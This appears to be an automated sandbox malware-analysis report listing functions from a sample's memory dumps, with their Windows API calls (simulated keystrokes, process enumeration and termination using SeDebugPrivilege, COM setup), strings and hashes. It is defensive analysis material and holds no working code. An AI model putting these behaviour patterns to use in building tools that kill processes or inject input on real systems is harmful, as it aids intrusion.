Opcode Fuzzy Hash: 947cd8c1de3e2fc77d7e8608efd7432fa61da083f661d584016000d26e83fee2
Instruction Fuzzy Hash: 3C317AB1200601AFDB21AFA5DC48A66BFE8FF19300B00845DF95A83660DB31E814DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B73A57
Part of subcall function 00B73A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00B725B3), ref: 00B73A5E
Part of subcall function 00B73A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00B73A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00B725BD
PostMessageW.USER32 ref: 00B725DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B725DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B725E9
PostMessageW.USER32 ref: 00B72601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B72605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B7260F
PostMessageW.USER32 ref: 00B72623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B72627

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: caea2ca38c91bfa8ddbbe5b6a3b691f97a9d079f94c0e73293a5821f46a58266
Instruction ID: 6a0e48778b51899c7a36e0c428216a6aa7235758465eb9fd3afa1dc5938934ba
Opcode Fuzzy Hash: caea2ca38c91bfa8ddbbe5b6a3b691f97a9d079f94c0e73293a5821f46a58266
Instruction Fuzzy Hash: 9E01D431390210BBFB1067689C8BF593F99DB4EB12F204001F328AF0D1CDE264459A69

Uniqueness

Uniqueness Score: -1.00%

Function 00B9A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00B7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B7D501
Part of subcall function 00B7D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B7D50F
Part of subcall function 00B7D4DC: CloseHandle.KERNEL32(00000000), ref: 00B7D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B9A16D
GetLastError.KERNEL32 ref: 00B9A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B9A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B9A268
GetLastError.KERNEL32(00000000), ref: 00B9A273
CloseHandle.KERNEL32(00000000), ref: 00B9A2C4

Strings

SeDebugPrivilege, xrefs: 00B9A18F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 2a06070de5eeab69f6fa3d6747e4ea94d3a71ea1aeed84758616bea542a5af8e
Instruction ID: 24adec6b1c271b053e29e30cbdd57df808abd7813f005250fb80dc1cec2caf2c
Opcode Fuzzy Hash: 2a06070de5eeab69f6fa3d6747e4ea94d3a71ea1aeed84758616bea542a5af8e
Instruction Fuzzy Hash: A7615B30208241AFDB20DF18C495F55BBE1AF45318F5484DCE46A4B7A2CB76ED89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B7C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00B7C913

Strings

question, xrefs: 00B7C8CC
blank, xrefs: 00B7C895
info, xrefs: 00B7C8B4
warning, xrefs: 00B7C8FC
stop, xrefs: 00B7C8E4

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 51cf38135bccde0c85ac4edb66ba0f4fa312023aef09d76d849bce5d0aa12e49
Instruction ID: f7b33dfc830687d70d911c1eea0b8bf2b9edb89e87f91656b73c14e74d27e830
Opcode Fuzzy Hash: 51cf38135bccde0c85ac4edb66ba0f4fa312023aef09d76d849bce5d0aa12e49
Instruction Fuzzy Hash: CE11BB3168930ABAA7065B549C83DEABBDCDF15354F6040FFFA18A62D2E7606D005269

Uniqueness

Uniqueness Score: -1.00%

Function 02A0C290 Relevance: 12.2, APIs: 8, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 02A0C2B7
_free.LIBCMT ref: 02A0C322
_free.LIBCMT ref: 02A0C348
_free.LIBCMT ref: 02A0C371
_free.LIBCMT ref: 02A0C3A9
_free.LIBCMT ref: 02A0C3DA
_free.LIBCMT ref: 02A0C41B
_free.LIBCMT ref: 02A0C4B5

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
Instruction ID: 7b78f134e2511c621b98c664e76f657f42e83ea4d2adae4dddeec0e6fc36d558
Opcode Fuzzy Hash: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
Instruction Fuzzy Hash: 56612571941305AFDB20AFA4B9C0B6DBBA7AF05334F0402AFE945972C1EF329800CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00B7ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B7ED2A
_wcslen.LIBCMT ref: 00B7ED3B
_wcslen.LIBCMT ref: 00B7ED79
_wcslen.LIBCMT ref: 00B7EDAF
_wcslen.LIBCMT ref: 00B7EDDF
_wcslen.LIBCMT ref: 00B7EDEF
_wcslen.LIBCMT ref: 00B7EE2B
_wcslen.LIBCMT ref: 00B7EE5A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 38297000c25b436d2dec9fdd5d14abc055feed95da082f9dddee18c92f242421
Instruction ID: bbbd853508ac8f5a9582cc74b2c2942185e7eaa2c5e49bbbe1ea38432f64e878
Opcode Fuzzy Hash: 38297000c25b436d2dec9fdd5d14abc055feed95da082f9dddee18c92f242421
Instruction Fuzzy Hash: A3413465C1111879CB11EBB4CC8AACF77E8AF49710F6085E6F528E3121FB34E655C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BA2D1B
GetDC.USER32(00000000), ref: 00BA2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA2D2E
ReleaseDC.USER32(00000000,00000000), ref: 00BA2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BA2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BA2D87
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BA2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BA2DE1

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: f1fed79fc05526850a6eee0213c847ff12c95c6474873ce902af33431fd35836
Instruction ID: e1de7a505c2b1c2d9dcc7886f159cc463e5f70ee6883bd2572c34b43228f5fb9
Opcode Fuzzy Hash: f1fed79fc05526850a6eee0213c847ff12c95c6474873ce902af33431fd35836
Instruction Fuzzy Hash: 12316D72205214BBEB218F548C8AFEB3FA9EB0A715F044065FE489B291CA759C50C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 02A34A22 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 02A34A37
_memcmp.LIBVCRUNTIME ref: 02A34A59
_memcmp.LIBVCRUNTIME ref: 02A34A71
_memcmp.LIBVCRUNTIME ref: 02A34A84
_memcmp.LIBVCRUNTIME ref: 02A34A9E
_memcmp.LIBVCRUNTIME ref: 02A34AB1
_memcmp.LIBVCRUNTIME ref: 02A34AC9
_memcmp.LIBVCRUNTIME ref: 02A34AE4

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f574267dd208e8414daf43423a911871f3c4da1cc2f54f3bbf8c3215cc0c872d
Instruction ID: fab2af66cd997ff680879259de71ffa9b51fc21387fd6574e252dacaf005d85c
Opcode Fuzzy Hash: f574267dd208e8414daf43423a911871f3c4da1cc2f54f3bbf8c3215cc0c872d
Instruction Fuzzy Hash: 8221F671F402097BE6969A119D82F7E375DAE58285B044031FE08EF385FF38DD24CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 02A438C0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A4393B
_wcslen.LIBCMT ref: 02A43999
_wcslen.LIBCMT ref: 02A439F4
_wcslen.LIBCMT ref: 02A43A3F
_wcslen.LIBCMT ref: 02A43AA7

Part of subcall function 029EEDF2: _wcslen.LIBCMT ref: 029EEDFD

Strings

kL, xrefs: 02A43B08

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: kL
API String ID: 176396367-491924299
Opcode ID: af21e6dbd2784cd6d5626297cf3271b9bc62aafdf5b90b252190d31c0118e202
Instruction ID: cf4879d59062f696501910dd6d3c1169f7dced26436ee95df04b8d58c7b43311
Opcode Fuzzy Hash: af21e6dbd2784cd6d5626297cf3271b9bc62aafdf5b90b252190d31c0118e202
Instruction Fuzzy Hash: 96B1C0316083029FCB10EF28C8D0A6AB7E5AFD4724F60896EF596C7291EF35D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B94523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B94648
VariantInit.OLEAUT32(?), ref: 00B94749
VariantClear.OLEAUT32(?), ref: 00B94753
VariantClear.OLEAUT32(?), ref: 00B947B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00B945D8, 00B94706, 00B947BE
Incorrect Object type in FOR..IN loop, xrefs: 00B9472C

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: a2f1882e47a21159626625fc08992f957c0cd4368ff0a36d163813e6505f9987
Instruction ID: 0bc26e2a7f04a56eb229b9c5ac153914c21afa3c7bffa24e6e27790311259a99
Opcode Fuzzy Hash: a2f1882e47a21159626625fc08992f957c0cd4368ff0a36d163813e6505f9987
Instruction Fuzzy Hash: 17919871900219ABDF24CFA4D884FAEBBF8EF46714F1085A9F505AB280D7749D46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B94BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00B7000E: CLSIDFromProgID.OLE32 ref: 00B7002B
Part of subcall function 00B7000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00B70046
Part of subcall function 00B7000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B6FF41,80070057,?,?), ref: 00B70054
Part of subcall function 00B7000E: CoTaskMemFree.OLE32(00000000), ref: 00B70064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00B94C51
_wcslen.LIBCMT ref: 00B94D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B94DCF
CoTaskMemFree.OLE32(?), ref: 00B94DDA

Strings

NULL Pointer assignment, xrefs: 00B94E23, 00B94E52

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 5e0aaacec21bbddf598fc43a57717f5357fe9b5bb5f672b4e305205644da78ff
Instruction ID: aab299b2d7cd05560beab316b10862d7efb96c5cfa04df15e9155eee0041a861
Opcode Fuzzy Hash: 5e0aaacec21bbddf598fc43a57717f5357fe9b5bb5f672b4e305205644da78ff
Instruction Fuzzy Hash: 2C910671D00219AFDF14DFA4D891EEEBBB8FF08310F5085AAE919A7251DB349A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32 ref: 00BA2183
GetMenuItemCount.USER32(00000000), ref: 00BA21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BA21DD
_wcslen.LIBCMT ref: 00BA2213
GetMenuItemID.USER32(?,?), ref: 00BA224D
GetSubMenu.USER32 ref: 00BA225B

Part of subcall function 00B73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B73A57
Part of subcall function 00B73A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00B725B3), ref: 00B73A5E
Part of subcall function 00B73A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00B73A65

PostMessageW.USER32 ref: 00BA22E3

Part of subcall function 00B7E97B: Sleep.KERNEL32 ref: 00B7E9F3

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: d0ee89abf671790cb6a87e8cef4a9e77e9c7b4d04aeb3ef60297132d60cd8151
Instruction ID: 3a78f2436b27b0914f0e22b596a8d88be74571e5326d365b40e005bec50834d2
Opcode Fuzzy Hash: d0ee89abf671790cb6a87e8cef4a9e77e9c7b4d04aeb3ef60297132d60cd8151
Instruction Fuzzy Hash: 40718F75E04205AFCB10DF68C885AAEBBF5EF4A310F1484A9E916FB351DB34ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 02A580D3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 02A38254: _wcslen.LIBCMT ref: 02A38277

_wcslen.LIBCMT ref: 02A5814E
_wcslen.LIBCMT ref: 02A5819C
_wcslen.LIBCMT ref: 02A581DC
_wcslen.LIBCMT ref: 02A5826E

Strings

D`L, xrefs: 02A58148
P`L, xrefs: 02A58265

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID: D`L$P`L
API String ID: 176396367-3785639107
Opcode ID: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
Instruction ID: 3c2ba142b6ba3b31ba243049e3680986ecbe346732ca6508d77b5e67fb7c9d3f
Opcode Fuzzy Hash: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
Instruction Fuzzy Hash: 3051B931A015269FCB14DF6CC9809BFB7B6BF54324B214229ED66E7284DB39DD81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B7AEF9
GetKeyboardState.USER32(?), ref: 00B7AF0E
SetKeyboardState.USER32(?), ref: 00B7AF6F
PostMessageW.USER32 ref: 00B7AF9D
PostMessageW.USER32 ref: 00B7AFBC
PostMessageW.USER32 ref: 00B7AFFD
PostMessageW.USER32 ref: 00B7B020

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f339462f228cd43cee0d5a019ce1904f5612ffb69be877984cc4a0db788bc284
Instruction ID: 0702fbcee371d6e287770fad0a15c1dce612fcc1b4b6ee6f7e99d505ecb8e0ba
Opcode Fuzzy Hash: f339462f228cd43cee0d5a019ce1904f5612ffb69be877984cc4a0db788bc284
Instruction Fuzzy Hash: 4051C1A16086D53DFB3682348845BBEBEE99B46304F08C5C9E1FD9A8C2C798A984D751

Uniqueness

Uniqueness Score: -1.00%

Function 00B7ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B7AD19
GetKeyboardState.USER32(?), ref: 00B7AD2E
SetKeyboardState.USER32(?), ref: 00B7AD8F
PostMessageW.USER32 ref: 00B7ADBB
PostMessageW.USER32 ref: 00B7ADD8
PostMessageW.USER32 ref: 00B7AE17
PostMessageW.USER32 ref: 00B7AE38

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c78af3acee59cf4857e914ca5e411e7c1813b573c46dd41a31dad510f0927a14
Instruction ID: 1014e9b6b7cb3b366b79090b1714881a86234ea98a7214b58590f3b5b7915b57
Opcode Fuzzy Hash: c78af3acee59cf4857e914ca5e411e7c1813b573c46dd41a31dad510f0927a14
Instruction Fuzzy Hash: 8151D5A15047D53DFB3683348C95BBEBEE89B86300F18C4D8E1ED568C2D694EC84D752

Uniqueness

Uniqueness Score: -1.00%

Function 02A3E119 Relevance: 10.6, APIs: 7, Instructions: 137COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A3E13B
_wcslen.LIBCMT ref: 02A3E179
_wcslen.LIBCMT ref: 02A3E1AF
_wcslen.LIBCMT ref: 02A3E1DF
_wcslen.LIBCMT ref: 02A3E1EF
_wcslen.LIBCMT ref: 02A3E22B
_wcslen.LIBCMT ref: 02A3E25A

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
Instruction ID: 0c4138aaa17b5343578a952f30d35949c37f34d6b5a5093ba29508b7b8fe1445
Opcode Fuzzy Hash: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
Instruction Fuzzy Hash: CA41B266C1021876CB92EBF488859CFB7A9AF84710F509863F618E3120FB34D255C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 029F2120 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 029F214B
___except_validate_context_record.LIBVCRUNTIME ref: 029F2153
_ValidateLocalCookies.LIBCMT ref: 029F21E1
__IsNonwritableInCurrentImage.LIBCMT ref: 029F220C
_ValidateLocalCookies.LIBCMT ref: 029F2261

Strings

csm, xrefs: 029F21F6

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
Instruction ID: 4451e5eb00f398759bbdf0b9b7ccf9afde6bc5542ef0a29c0de464ccf87ff155
Opcode Fuzzy Hash: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
Instruction Fuzzy Hash: 12419334E002099BCB90DF68CC84B9EBBB9BF85368F148156EF156B391D731AA51CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B32D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B32D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00B32D53
_ValidateLocalCookies.LIBCMT ref: 00B32DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00B32E0C
_ValidateLocalCookies.LIBCMT ref: 00B32E61

Strings

csm, xrefs: 00B32DF6

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
